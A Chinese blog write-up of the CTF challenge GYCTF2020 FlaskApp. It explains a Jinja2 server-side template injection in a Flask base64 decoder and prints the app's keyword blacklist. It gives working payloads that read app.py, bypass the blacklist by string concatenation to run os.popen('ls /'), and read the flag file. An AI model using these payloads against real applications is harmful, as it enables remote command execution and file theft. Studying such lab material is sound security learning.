[GYCTF2020]FlaskApp1

最新推荐文章于 2025-03-07 16:38:08 发布
最新推荐文章于 2025-03-07 16:38:08 发布
阅读量424 收藏 2
点赞数 4
文章标签: java 数据库 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2303_77961060/article/details/138632746
版权

 一个简单的base64加密解密小程序,以及一张图片。

当在解密处输不可以解码的字符串时报错

经过查看发现源代码

@app.route('/decode',methods=['POST','GET'])

def decode():

    if request.values.get('text') :

        text = request.values.get("text")

        text_decode = base64.b64decode(text.encode())

        tmp = "结果 : {0}".format(text_decode.decode())

        if waf(tmp) :

            flash("no no no !!")

            return redirect(url_for('decode'))

        res =  render_template_string(tmp)

通过源代码的框架可以判断是Flask,Flask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。

所谓的MVC模型就是将一个软件系统分为了三个组成部M(model)模型,V(view)视图,C(controler)控制器。

在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于render_template_string的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.

render_template
#该函数指定一个模板文件进行渲染在模板文件可以使用相应的模板格式的语法如{{}}
#进行变量的引用,这个时候的语法是写入到一个静态文件当中的已经固定了我们无法进行SSTI注入

render_template_string
#该函数是对一个字符串进行渲染同样在遇到有符合模板语法的内容时会进行解析
#如render_template_string("<h1>my name is {}".format(request.args.get('name')))
#此时的name是我们从url中获取的GET参数是用户可控的当name是一个符合模板语法格式的字符串时会
#会被进行解析执行如输入{{ 4*5 }}会进行运算输出20
#www.baidu.com/?name={{ 4*5 }}
name={{ [].__bases__ }}

可以看到源代码里

res =  render_template_string(tmp)

 有SSTI注入漏洞,可以通过渲染去测试一下。

构造{{config}},先加密,再把加密结果解密,结果输出

输出了config的内容,说明存在ssti漏洞

构造payloud读取源码

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

**payload解读**
 [].__class__#返回的是[]的类型list为列表
   
   list.__base__#返回list的一个父类为object是所有类的基类所有类都是继承自object
   
   object.__subclasses__()#返回object的所有子类所有继承自object的类
   
   #循环遍历这些类寻找catch_warnings这个类进入该类
   
   c.__init__#表示c类中的init这个内置方法
   
   __init__.__globals__['__builtins__']#返回init这个方法可以使用的类、方法、以及属性当中的__builtins__
   
   __builtins__#表示内建方法因为这里所使用的open是一个内建方法利用open打开源码调用read读取

得到源码,分析一下

  from flask import Flask,render_template_string 
  from flask import render_template,request,flash,redirect,url_for 
  from flask_wtf import FlaskForm 
  from wtforms import StringField, SubmitField 
  from wtforms.validators import DataRequired 
  from flask_bootstrap import Bootstrap 
  import base64 
  app = Flask(__name__) 
  app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y'#可以利用进行session伪造但是此处没有用处 
  bootstrap = Bootstrap(app) 
  
  class NameForm(FlaskForm): 
  	text = StringField('BASE64加密',validators= [DataRequired()]) 
  	submit = SubmitField("提交") 
  
  class NameForm1(FlaskForm): 
  	text = StringField('BASE64解密',validators= [DataRequired()]) 
  	submit = SubmitField('提交') 
  
  def waf(str): 
  	black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"] 
  	for x in black_list : 
  		if x in str.lower() : 
  			return 1 
  
  @app.route('/hint',methods=['GET']) 
  	def hint(): 
  		txt = "失败乃成功之母!!" 
  		return render_template("hint.html",txt = txt) 
  
  @app.route('/',methods=['POST','GET']) 
  	def encode(): 
  		if request.values.get('text') : 
  			text = request.values.get("text") 
  			text_decode = base64.b64encode(text.encode()) 
  			tmp = "结果 :{0}".format(str(text_decode.decode())) 
  			res = render_template_string(tmp) 
  			flash(tmp) 
  			return redirect(url_for('encode')) 
  		else : 
  			text = "" 
  			form = NameForm(text) 
  			return render_template("index.html",form = form ,method = "加密"
  														 ,img = "flask.png") 
  
  @app.route('/decode',methods=['POST','GET']) 
  	def decode(): 
  		if request.values.get('text') : 
  			text = request.values.get("text") 
  			text_decode = base64.b64decode(text.encode()) 
  			tmp = "结果 : {0}".format(text_decode.decode()) 
  			if waf(tmp) : 
  				flash("no no no !!") 
  				return redirect(url_for('decode')) 
  			res = render_template_string(tmp) 
  			flash( res ) 
  			return redirect(url_for('decode')) 
  		else : 
  			text = "" 
  			form = NameForm1(text) 
  			return render_template("index.html",form = form, method = "解密" , img = "flask1.png") @app.route('/&lt;name&gt;',methods=['GET']) 
  	def not_found(name): 
  		return render_template("404.html",name = name) 
  
  if __name__ == '__main__': 
  	app.run(host="0.0.0.0", port=5000, debug=True)#监听主机的所有ip的5000端口

black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]

从这里可以看到过滤了flag,os,system等操作命令

可以利用字符串拼接绕过,构造:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

得到flag

 

[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1472
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
GYCTF2020 FlaskApp
汗的博客
09-04 1924
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
[GYCTF2020]FlaskApp 1
ubaichu的博客
07-13 1114
[GYCTF2020]FlaskApp 1 详细解题过程
BUUCTF——[GYCTF2020]FlaskApp1 SSTI模板注入/PIN学习
最新发布
2401_88083440的博客
03-07 1396
尝试读取这个文件,但这里因为有flag黑名单,需要进行一些绕过,尝试用python列表的特性,使字符串倒过来(this_is_the_flag)(或者直接构造'this_is_the_fl'+'ag.txt'应该也行)linux的id一般存放在/etc/machine-id 或 /proc/sys/kernel/random/boot_i 中。得到:/usr/local/lib/python3.7/site-packages/flask/app.py。获取基类,tuple类的基类是object类。
BUU41 [GYCTF2020]FlaskApp1【SSTI】
2401_86190146的博客
02-25 1016
题目:加密处没啥事,但是解密的地方提交{{7*7}}就会返回报错界面,顺便把代码也爆出来了先将字符串 text编码为字节对象,然后使用函数对这个字节对象进行 Base64 解码操作,报错的原因也就是解码没成功,将{{7*7}}进行base64编码后输入可能是过滤了{{ }} 把 {{ }} 去了还是nonono试试7+7,成功。。?具体流程:1.套模板,发现被过滤了字符,查看源代码2.列目录。
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4572
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
[GYCTF2020]FlaskApp
missht0的博客
01-31 552
[GYCTF2020]FlaskApp 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。 debug模式的情况下可以抛出详细异常信息 base64解密界面随意输入字符串,导致解码报错 提示存在ssti注入 flask模板注入框架 查看根目录 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__glo
[GYCTF2020]FlaskApp -wp
freerats的博客
08-19 571
打开后一个base64加密框 在解密处容易输入一些东西会导致报错,还会出一部分源码 @app.route('/decode',methods=['POST','GET']) def decode(): if request.values.get('text') : text = request.values.get("text") text_decode = base64.b64decode(text.encode()) tmp = "结.
Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3414
ssti的payload还是不太会写… Flask debug 模式生成pin码 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
[GYCTF2020]Blacklist 1
01-14
### GYCTF2020 Blacklist 1 Writeup #### 考点分析 题目主要考察SQL注入技巧以及如何绕过黑名单过滤机制。通过一系列尝试,最终利用MySQL特有的`HANDLER`语句成功获取目标数据[^1]。 #### 解题思路概述 面对此题时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值